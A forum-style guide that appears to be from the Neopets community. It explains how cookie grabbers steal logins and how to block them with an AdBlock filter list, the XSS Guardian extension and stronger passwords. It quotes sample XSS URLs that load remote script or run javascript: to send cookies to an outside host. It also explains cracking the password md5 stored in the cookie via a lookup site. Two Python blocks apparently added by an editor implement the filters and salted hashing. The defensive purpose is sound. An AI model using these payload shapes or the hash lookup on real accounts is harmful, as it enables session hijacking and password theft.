Neopets Cookie Grabber Protection!

(For Firefox)

Cookie Grabbers!
Currently a load of people have one, a load more want one, and some of us don’t particularly want them to have our cookies.

If you don’t want to read the background information or babble and just want to install what’s needed, go right down to the bottom of this post, under “Short and sweet”.

If you want to know what a cookie grabber is then use google, because you can find some pretty good explanations of it to be honest. Here’s just an explanation of how to somewhat defend against them.

There are two main ways people are grabbing cookies on neopets at the moment:

The Coding Error
This normally takes the form of
http://www.neopets.com/page.phtml?a=<script src="http://a.com/lol.js"></script>

This is a page on neopets that, because of a coding error, allows custom code to be embedded onto the page. The custom code embedded into the page is normally javascript which takes your cookies and sends them to a site to store them. These are normally either embedded in pages via iframes, or you’re sent straight to them if the person is a bit dim and hasn’t heard of iframes.

The SWF clicktag
Basically a load of neopets.com flash files send you to another page when you click on them, and being who they are they have let the destination be set via the URL.

These normally take the form of
http://images.neopets.com/lovelyadvert.swf?clicktag=javascript:location.href=blahblah

And if you click the random swf you’ve been redirected to, the javascript is executed.
These can’t really be embedded in pages in newer browsers, and IE7 doesn’t let them work properly if you’re directly sent to one.

Steps in stopping them (I prefer options 3 and 4 together.)

1. Don’t go to any offsite links from neopets.
It’s true, but honestly I still go on a load of offsite links. And the thing is, anybody who knows you go on neopets can send you a link over msn with an embedded cookie grabber on. Being paranoid and logging out of neopets before you go to any other site, well I couldn’t be arsed with it.

2. Install NoScript for FireFox
https://addons.mozilla.org/en-US/firefox/addon/722
This again works but I normally end up turning NoScript off because the alerts annoy the hell out of me, having to enable every site I visit does get very tedious and it makes me just click yes to everything.

If you want to be in serious control of what scripts can run and which can’t then this is for you, but for most people it’s just extra unneeded micromanagement. Also, although it has built-in XSS protection (cookie grabbers use this technique), it interferes with a lot of stuff.

So this is good for blocking javascript all over the place, but you’ve got to get used to it.

3. My AdBlock list for FireFox to stop CookieGrabbers.
https://addons.mozilla.org/en-US/firefox/addon/1865
If you don’t have AdBlock, then basically it blocks all the adverts on the internet (Yay!) and whatnot. If you love adverts, you can still install it, and when it asks you to subscribe to a list just say no and cancel.

This is pretty painless in terms of affecting your browsing. You need to save this list, and import it into AdBlock.
http://www.mediafire.com/?jxsmixfx2uj

This list basically blocks most embedded offsite cookie grabbers: it filters out the most common bits of a cookie grabber that lives purely in the URL, the “document.cookie” and “javascript:” parts. And it stops any embedded page from neopets having an opening tag in the URL, which is never used anyway by neopets. You can still send open code tags when editing lookups because that’s a direct request, so yeah.


What’s inside the txt file:

Code:
(Adblock Plus 0.6.1 or higher required) [Adblock]
*neopets*%3C*
*neopets*<*
*neopets.com*document.cookie*
*neopets.com*javascript:*
*neopets.com*script*

4. XSS Guardian
As mentioned in the explanation there are some Flash (.SWF) based cookie grabbers, and some other ones where you’re directly sent to the page. Adblock won’t stop these because it’s a direct request, so here we have another extension!

This basically does the same thing as adblock but on direct URLs: it scans the URL for common XSS payloads.
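As an added illustration (not code from the post, and not the AdBlock or XSS Guardian source), here is a small Python script that does the two checks the post describes: it applies the wildcard rules from the txt file above to URLs that a page tries to load, and it does the “direct URL” check that XSS Guardian does by percent-decoding the URL you are navigating to and looking for the same tokens. The rules in the post only use `*`, so treating each rule as a glob is enough here; real Adblock Plus filter syntax has more features that this does not implement. All the URLs in the script are constructed test inputs.

```python
import re
from urllib.parse import unquote

# Constructed copy of the filter list quoted in the post (AdBlock wildcard syntax).
FILTER_LIST = """(Adblock Plus 0.6.1 or higher required) [Adblock]
*neopets*%3C*
*neopets*<*
*neopets.com*document.cookie*
*neopets.com*javascript:*
*neopets.com*script*
"""

# Tokens that the direct-URL check looks for after percent-decoding.
SUSPICIOUS_TOKENS = ("<", "javascript:", "document.cookie")


def parse_filters(text):
    """Return the wildcard rules, skipping the header line, comments and blanks."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "([!":
            continue
        rules.append(line)
    return rules


def rule_to_regex(rule):
    """Turn an AdBlock '*' wildcard rule into an anchored, case-insensitive regex."""
    parts = [re.escape(part) for part in rule.split("*")]
    return re.compile("^" + ".*".join(parts) + "$", re.IGNORECASE)


def matching_rule(url, rules):
    """Return the first rule that blocks this URL, or None if it is allowed."""
    for rule in rules:
        if rule_to_regex(rule).match(url):
            return rule
    return None


def decode_fully(url, max_rounds=3):
    """Undo repeated percent-encoding so %253C is seen as '<' just like %3C is."""
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url


def looks_like_cookie_grabber(url):
    """Direct-navigation check: which suspicious tokens appear in the decoded URL."""
    decoded = decode_fully(url).lower()
    return [token for token in SUSPICIOUS_TOKENS if token in decoded]


if __name__ == "__main__":
    rules = parse_filters(FILTER_LIST)
    # Constructed sample URLs: the two attack shapes from the post plus two normal pages.
    samples = [
        "http://www.neopets.com/page.phtml?a=<script src=http://a.com/lol.js></script>",
        "http://www.neopets.com/page.phtml?a=%3Cscript%20src%3Dhttp://a.com/lol.js%3E",
        "http://images.neopets.com/lovelyadvert.swf?clicktag=javascript:location.href=http://a.com/x",
        "http://www.neopets.com/petcentral.phtml",
        "http://images.neopets.com/items/toy_ball.gif",
    ]
    for url in samples:
        print(matching_rule(url, rules), looks_like_cookie_grabber(url), url)
```

One caveat the glob makes visible: the last rule, `*neopets.com*script*`, blocks any neopets.com URL containing the substring “script”, including harmless paths where that substring appears inside a longer word, which is the kind of over-blocking the post alludes to when it says the filters are “pretty painless” but not free of side effects.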

This pops up when it’s blocked something:

There are a few download URLs for this one.

1. Original file from firefox addons, re-uploaded since it’s currently in the sandbox testing area on mozilla.org
http://www.mediafire.com/?21341zgxgyq

2. Edited to work with FireFox 3
http://www.mediafire.com/?m19fm0u0pne

3. Edited to work with FireFox 3 and not add another stupid icon to your statusbar (You’ll have to enable and disable it in the addons sections of firefox)
http://www.mediafire.com/?zw3nyycmmz0

These XPI files will download to your default download location, and then you have to drag them into an open firefox window. 

Don’t become apathetic, these aren’t foolproof and if you still get CG’d don’t come to beat me up 

COOKIE GRABBED AND DIDN’T REALISE? OH NOES.

There are plenty of guides on neopets.com about immediate action, if you think you’ve been CG’d change your password pretty quickly.

If these measures didn’t protect you and you got cookie grabbed, then this is what the person who’s got your cookie is going to do.

1. Use your cookies and neopets.com thinks they’re you, so they basically are logged into your account. However they don’t know your password or PIN number, so they can’t change the email or preferences. And if you PIN everything you should be fine.

2. Try and decrypt your cookies

Sadly Neopets have decided that security isn’t needed and have used a simple md5 hash on your password and stored it in your cookies.

There’s a nice part of the cookie that looks like
toolbar=USERNAME%2BB%2B151a30458b3336820a0f1408a59c3732
The last bit (151a30458b3336820a0f1408a59c3732) is an md5 hash of your password 😮

They can slap it in http://gdataonline.com/seekhash.php and try to look up the password it was made from.
You know how you beat this?

Use basic password rules: use a long password, or use multiple numbers and punctuation marks.

If your password is “golf123”, make your password “golf123golf123”: it’ll make the hashed value completely different, and long passwords won’t be in the databases of websites like the one mentioned.
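To show what the post is describing, here is an added Python example (not code from the post or from Neopets) that pulls the hash out of a cookie shaped like the `toolbar=USERNAME%2BB%2B<hash>` line above, shows why an unsalted md5 is a lookup-table problem (the same password always gives the same 32-character hash, for every user), shows that lengthening the password changes the hash completely, and contrasts it with what a site should store instead: a per-user random salt and an iterated key derivation (PBKDF2-HMAC-SHA256 here). The cookie layout is assumed from the single line quoted in the post, and the username and password in the sample are made up.

```python
import hashlib
import hmac
import os
from urllib.parse import unquote


def unsalted_md5(password):
    """The kind of value the post says Neopets stores in the cookie: plain md5, no salt."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


# Constructed sample cookie in the shape quoted in the post ("%2B" is a URL-encoded "+").
SAMPLE_TOOLBAR_COOKIE = "toolbar=exampleuser%2BB%2B" + unsalted_md5("golf123")


def parse_toolbar_cookie(cookie):
    """Split 'toolbar=USERNAME%2BB%2B<md5>' into its three fields (layout assumed from the post)."""
    name, _, value = cookie.partition("=")
    if name != "toolbar":
        raise ValueError("not a toolbar cookie")
    parts = unquote(value).split("+")
    if len(parts) != 3:
        raise ValueError("unexpected toolbar cookie layout")
    username, flag, password_hash = parts
    return {"username": username, "flag": flag, "password_md5": password_hash}


def is_md5_hex(value):
    """An md5 hash is always 32 lowercase hex characters, which is how you spot one in a cookie."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)


def salted_slow_hash(password, salt=None, iterations=100_000):
    """What a site should store instead: random per-user salt + iterated PBKDF2.

    Two users with the same password get different stored values, and each guess
    costs `iterations` HMAC computations instead of one md5, so a lookup table
    like the one the post mentions does not work.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt.hex() + "$" + str(iterations) + "$" + digest.hex()


def verify_salted(password, stored):
    """Check a password against a value produced by salted_slow_hash, in constant time."""
    salt_hex, iterations, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    fields = parse_toolbar_cookie(SAMPLE_TOOLBAR_COOKIE)
    print("cookie fields:", fields)
    print("same password, same hash for everyone:", unsalted_md5("golf123") == fields["password_md5"])
    print("golf123        ->", unsalted_md5("golf123"))
    print("golf123golf123 ->", unsalted_md5("golf123golf123"))
    stored = salted_slow_hash("golf123")
    print("salted+iterated:", stored)
    print("verify ok:", verify_salted("golf123", stored), "wrong pw:", verify_salted("golf124", stored))
```

The point of the last two functions is the contrast: with the cookie’s unsalted md5, anyone who sees your cookie can compare the hash against a precomputed table, which is exactly why the post’s advice (a longer password that nobody has precomputed) helps; with a salted, iterated hash the table would have to be rebuilt per user, which is the property the site should have provided in the first place.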

And although that was long, hopefully it was informative.
If it was just annoyingly long, say so, because I might write a couple more guides and I don’t want to be a bore.
Love CyberShot.


----- Short and sweet -----

Adblock Filter list:
If you don’t have AdBlock install it here, it’s an advert blocking FireFox Addon https://addons.mozilla.org/en-US/firefox/addon/1865
Import following txt file into Adblock via (Tools -> preferences -> import list)
http://www.mediafire.com/?jxsmixfx2uj

XSS Guardian: 
Another FireFox extension,
Original Install File : 
http://www.mediafire.com/?21341zgxgyq
FireFox 3 compatible Install File : http://www.mediafire.com/?m19fm0u0pne
Firefox 3 compatible without Status Bar Image File : http://www.mediafire.com/?zw3nyycmmz0
Filters out direct cookie grabbers.
!!!!: These XPI files will download to your default download location, and then you have to drag them into an open firefox window.

Don’t go to offsite websites when logged in on neopets:
A bit restricting.

Follow good password rules: